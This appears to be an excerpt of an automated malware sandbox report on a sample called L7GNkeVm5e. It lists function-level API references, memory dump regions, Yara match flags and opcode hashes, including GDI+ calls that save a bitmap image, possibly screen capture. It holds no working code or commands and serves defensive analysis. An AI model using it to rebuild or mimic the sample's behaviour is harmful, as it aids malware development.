                                                                                                                                                                                                                                                  • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                                                  • Instruction ID: 0f21323f4a8c745cb15df45e762c1e0c12e5756601777ac9851836ddcf810012
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F011E1728802289FCB14EBA0D8C0AFD7772BF44710F10451AE811AB2D1DBB49A05CFE1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 02104E82
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 02104E99
                                                                                                                                                                                                                                                    • Part of subcall function 0210BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0210BFCA
                                                                                                                                                                                                                                                    • Part of subcall function 0210BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0210BFE4
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 02104EA2
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 02104ED3
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 02104EE9
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02104F07
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                                                  • Instruction ID: 1a9609d6c9cdf59eb370d30ef3d029a06989561990cf496be797109b46c3c8f3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2111E531D802289FCF24EBA0D8C0AEE77B2BF04714F240419E510A72D0DBB49A04CF90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00404E60
                                                                                                                                                                                                                                                    • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EAB
                                                                                                                                                                                                                                                  • __Getcoll.LIBCPMT ref: 00404EBA
                                                                                                                                                                                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ECA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                  • String ID: \J@
                                                                                                                                                                                                                                                  • API String ID: 1836011271-3870157017
                                                                                                                                                                                                                                                  • Opcode ID: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                                                                                                                                                                                                  • Instruction ID: fdee6073741f171039223b21022534e6c74e6b1a9002e69b8caf09e8127dea3b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E0169719102099FDB10EFA5C441B9DB7B0FF44319F00803EE145BB6C1DB789544CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002), ref: 0042FEF4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF07
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000), ref: 0042FF2A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                  • Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                                                                                                                                                                                                  • Instruction ID: 04c50191246c36c7712c7b2292fbce18726cdb65abb1a7ec348a7059dfc2f8e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F0C831A10218BBDB109F90DD09B9EBFB4EF05B12F510076F805A2290CF795E44CB8C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE11
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE35
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE48
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE56
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pScheduler
                                                                                                                                                                                                                                                  • API String ID: 3657713681-923244539
                                                                                                                                                                                                                                                  • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                                                  • Instruction ID: eb07aeb186abff06dd5fb113d00e985a326b9016228af1cb3add82d84dc8ee7b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56F05935A40704A3C714FB05DC92CDEB3799E90718760812FE40663182DB7CAD8AC29D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3_catchmake_shared
                                                                                                                                                                                                                                                  • String ID: MOC$RCC$f)D
                                                                                                                                                                                                                                                  • API String ID: 3472968176-2775210027
                                                                                                                                                                                                                                                  • Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                                                  • Instruction ID: 4c5a5222f277707b7ad8892d25512f067f64ee06960eb458d866c1bd219572a0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF06271580164CFDF19EF66C44066C3B75AF1AB00F854091F5486B2A0DF799A44DFA1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                                                                                                                                                                                                  • Instruction ID: 170f1839d68b6508eaaaec35cfa06bac438a8aba58ef65257e70e7e464c4b835
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B71AF31B00266DBCB21CF95E884ABFBB75EF41360B98426BE81067290DB749D45C7E9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                                  • Instruction ID: f24feca4b2bfbc12c14cec1d8029f4f6f4f9263e060ce35892e87e142c9da351
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C871B7719482769BCB258F54C8847BFBB79FF45318F584225F4116B180D7709AA9CBA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00430B3F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00430B56
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00430B75
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00430B90
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00430BA7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                                                                                                                                  • Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                                                                                                                                                                  • Instruction ID: 2fc0cbae349d2941fff749f5b49d8ba5872ca9652a97fa93675838e70d9d8155
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F51D131A00304AFEB219F69D851B6BB7F4EF5C724F14566EE809D7251E739E901CB88
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                                                                                                                                  • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                  • Instruction ID: 3070da549a70c4c19448a28c609613812cd7846e21844d8ff3ca05011b9e4e9f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5151D771A80304AFDB26DF29DC41B6AB7F6EF48724F14456DE809D7250E736E911CB84
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                                  • Instruction ID: 2c394445bd20a04972dd2082f140732d1460e75e39bee70d4e52ced8c5000be3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A41C432A00304ABCB10DF78C981A5EB7E5EF89714F15456AE616EB391DB35ED01CB88
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                                  • Instruction ID: 08ad888272e3320f50a4ed504539de9e592dac140fe1e634a31cbcada99d0ffe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0341BE32A40304AFCB15DF78C880A6DB7B6EF89714B1545A9EA19EB381E731E901CB81
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0EA,00000000,00000000,0042D928,?,0042D928,?,00000001,0042D0EA,23E85006,00000001,0042D928,0042D928), ref: 004368DA
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00436912
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436963
                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436975
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0043697E
                                                                                                                                                                                                                                                    • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 313313983-0
                                                                                                                                                                                                                                                  • Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                                                                                                                                                                  • Instruction ID: d963c907df35f4e1b8a381e23a898db453a996a2d0481b790983a8c47d787b2f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F31F072A0021AABDF259F65DC41EAF7BA5EF44710F15422AFC04D7290EB39CD54CB94
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _SpinWait.LIBCONCRT ref: 0041AEDB
                                                                                                                                                                                                                                                    • Part of subcall function 00410F11: _SpinWait.LIBCONCRT ref: 00410F29
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEEF
                                                                                                                                                                                                                                                  • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF21
                                                                                                                                                                                                                                                  • List.LIBCMT ref: 0041AFA4
                                                                                                                                                                                                                                                  • List.LIBCMT ref: 0041AFB3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3281396844-0
                                                                                                                                                                                                                                                  • Opcode ID: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                                                                                                                                                                                                  • Instruction ID: 8a1b27d7ac99c42c423c038c6da62c4f09041a57878ada6c0d5966c490a343f4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76318B71A02719DFCB10EFA5D5915EEB7B1BF04308F04006FE80167242DB796DA5CB9A
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _SpinWait.LIBCONCRT ref: 0211B142
                                                                                                                                                                                                                                                    • Part of subcall function 02111178: _SpinWait.LIBCONCRT ref: 02111190
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0211B156
                                                                                                                                                                                                                                                  • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0211B188
                                                                                                                                                                                                                                                  • List.LIBCMT ref: 0211B20B
                                                                                                                                                                                                                                                  • List.LIBCMT ref: 0211B21A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3281396844-0
                                                                                                                                                                                                                                                  • Opcode ID: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                                                                                                                                                                  • Instruction ID: e539a5e9831fb0e36702ca8d7fffa927f5f5ca338c28efc2a090547fb656ca37
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4315772D89A66DFCB18EFA4E9906EDF7B2BF44308F06007AC85167650DB716A14CF90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402060
                                                                                                                                                                                                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 00402068
                                                                                                                                                                                                                                                  • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00402083
                                                                                                                                                                                                                                                  • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020AD
                                                                                                                                                                                                                                                  • GdiplusShutdown.GDIPLUS(?), ref: 004020D9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2357751836-0
                                                                                                                                                                                                                                                  • Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                                                                                                                                                                  • Instruction ID: 3210944159f0fc98eb109693a3395d5946c9c878d3acb397b58b4dcf5ef0325c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E72171B5A0031AAFCB10DF65DD459AFFBB8FF48741B104036EA02E3290D7759901CBA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 02105099
                                                                                                                                                                                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 021050AD
                                                                                                                                                                                                                                                    • Part of subcall function 0210BDA4: __EH_prolog3_GS.LIBCMT ref: 0210BDAB
                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 02105112
                                                                                                                                                                                                                                                  • __Getcoll.LIBCPMT ref: 02105121
                                                                                                                                                                                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02105131
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1844465188-0
                                                                                                                                                                                                                                                  • Opcode ID: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                                                                                                                                                                                                  • Instruction ID: 33c8878b1d331273e391e21e507134f9805b4fafe97f2afa7ac0bc22ee6bd414
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E217971990308EFDB20EFA4D494B9DBBB2BF54711F50861AE085AB2C1DBF49944CF91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431F88
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431FAF
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00431FC5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                  • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                  • Instruction ID: e50af596af166b8a3d4a0e4732677f958598b7c5f443a1734cc3cd8306247ad3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7014936609A003BD3122B315C45D2B266DABD977AF21212FF805933E2EB2C8902512D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(0210DACD,0210DACD,00000002,0212ED25,02133941,00000000,?,021269F5,00000002,00000000,00000000,00000000,?,0210CF7E,0210DACD,00000004), ref: 021321BA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021321EF
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132216
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0210DACD), ref: 02132223
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0210DACD), ref: 0213222C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                  • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
